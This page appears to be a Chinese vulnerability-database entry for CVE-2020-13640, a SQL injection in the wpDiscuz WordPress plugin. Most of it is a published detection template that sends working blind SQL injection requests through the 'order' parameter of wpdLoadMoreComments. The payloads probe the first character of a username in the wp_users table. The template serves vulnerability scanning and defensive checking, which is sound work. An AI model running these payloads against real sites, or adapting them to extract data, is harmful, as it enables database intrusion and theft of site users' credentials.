CVE-2020-13640: wpDiscuz <= 5.3.5 - SQL Injection

日期: 2025-08-01 | 影响软件: wpDiscuz | POC: 已公开

漏洞描述

A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the order parameter of a wpdLoadMoreComments request.

PoC代码[已公开]

id: CVE-2020-13640

info:
  name: wpDiscuz <= 5.3.5 - SQL Injection
  author: Sourabh-Sahu
  severity: critical
  description: |
    A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the order parameter of a wpdLoadMoreComments request.
  reference:
    - https://github.com/asterite3/CVE-2020-13640
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13640
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-13640
    epss-score: 0.2192
    epss-percentile: 0.95579
    cwe-id: CWE-89
    cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: gvectors
    product: wpdiscuz
    fofa-query: body="/wp-content/plugins/wpdiscuz"
  tags: cve,cve2020,wordpress,wp,wp-plugin,wpdiscuz,sqli,vkev

flow: |
  http(1)
  set("postid", iterate(template.postid)[0])
  http(2) && http(3)

http:
  - raw:
      - |
        GET /wp-json/wp/v2/comments HTTP/1.1
        Host: {{Host}}

    stop-at-first-match: true
    extractors:
      - type: regex
        name: postid
        part: body
        group: 1
        regex:
          - 'post"\s*:\s*([0-9]+)'
        internal: true

  - raw:
      - |
        POST /wp-content/plugins/wpdiscuz/utils/ajax/wpdiscuz-ajax.php HTTP/1.1
        Host: {{Host}}
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        action=wpdLoadMoreComments&offset=1&orderBy=comment_date_gmt&order=, (SELECT CASE WHEN (ORD(SUBSTRING((SELECT user_login FROM wp_users LIMIT 0,1),1,1)) > 96) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END)=1 ASC #&lastParentId=&postId={{postid}}

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - 'comment_list":"<div id=\"wc-comm'
        internal: true

  - raw:
      - |
        POST /wp-content/plugins/wpdiscuz/utils/ajax/wpdiscuz-ajax.php HTTP/1.1
        Host: {{Host}}
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        action=wpdLoadMoreComments&offset=1&orderBy=comment_date_gmt&order=, (SELECT CASE WHEN (ORD(SUBSTRING((SELECT user_login FROM wp_users LIMIT 0,1),1,1)) > 97) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables) END)=1 ASC #&lastParentId=&postId={{postid}}

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - '"comment_list":null'
        condition: and
# digest: 4a0a00473045022100e7f18e610ec50682c296a5e34f80c1785a10125d9a9556f6acaa1e6b69dda2d402205c59454e44d6682b2628f9486ffba0e163441499bb3aedc98a5078ad4dba0bad:922c64590222798bb761d5b6d8e72950

相关漏洞推荐